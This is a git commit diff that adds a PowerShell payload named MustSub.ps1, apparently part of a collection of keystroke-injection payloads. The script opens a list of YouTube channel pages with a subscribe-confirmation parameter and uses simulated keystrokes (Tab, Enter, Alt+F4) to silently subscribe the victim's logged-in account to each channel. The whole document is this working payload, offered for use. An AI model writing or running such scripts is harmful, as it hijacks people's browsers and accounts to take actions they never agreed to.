Add files via upload
This commit is contained in:
parent
0c0b029e86
commit
25fcf460e5
77 changed files with 6590 additions and 0 deletions
40
Payloads/MustSub/MustSub.ps1
Normal file
40
Payloads/MustSub/MustSub.ps1
Normal file
|
@ -0,0 +1,40 @@
|
|||
$channels = @"
|
||||
https://www.youtube.com/iamjakoby
|
||||
https://www.youtube.com/c/CosmodiumCS
|
||||
https://www.youtube.com/c/zSecurity
|
||||
https://www.youtube.com/c/SystemExploited/featured
|
||||
https://www.youtube.com/c/Lab401
|
||||
https://www.youtube.com/c/TheCyberMentor
|
||||
https://www.youtube.com/c/JohnHammond010
|
||||
https://www.youtube.com/c/MalwareTechBlog
|
||||
https://www.youtube.com/c/SecurityFWD
|
||||
https://www.youtube.com/c/Nahamsec
|
||||
https://www.youtube.com/c/jhaddix
|
||||
https://www.youtube.com/c/NetworkChuck
|
||||
https://www.youtube.com/c/DavidBombal
|
||||
https://www.youtube.com/c/JimBrowning
|
||||
https://www.youtube.com/user/TechInterpreterInc
|
||||
"@
|
||||
|
||||
$URLs = $channels -split "`n"
|
||||
|
||||
function subscribe {
|
||||
|
||||
[CmdletBinding()]
|
||||
param (
|
||||
[Parameter (Mandatory = $True, Position=0, ValueFromPipeline = $True)]
|
||||
[string]$channel
|
||||
)
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$o=New-Object -ComObject WScript.Shell
|
||||
$url = -join($channel,"?sub_confirmation=1")
|
||||
Start-Process $url
|
||||
Start-Sleep -Seconds 3
|
||||
[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2)
|
||||
[System.Windows.Forms.SendKeys]::SendWait('{ENTER}')
|
||||
Start-Sleep -Seconds 1
|
||||
[System.Windows.Forms.SendKeys]::SendWait('%{F4}')
|
||||
Start-Sleep -Seconds 1
|
||||
}
|
||||
|
||||
foreach ($channel in $URLs) {subscribe $channel}
|
Loading…
Add table
Add a link
Reference in a new issue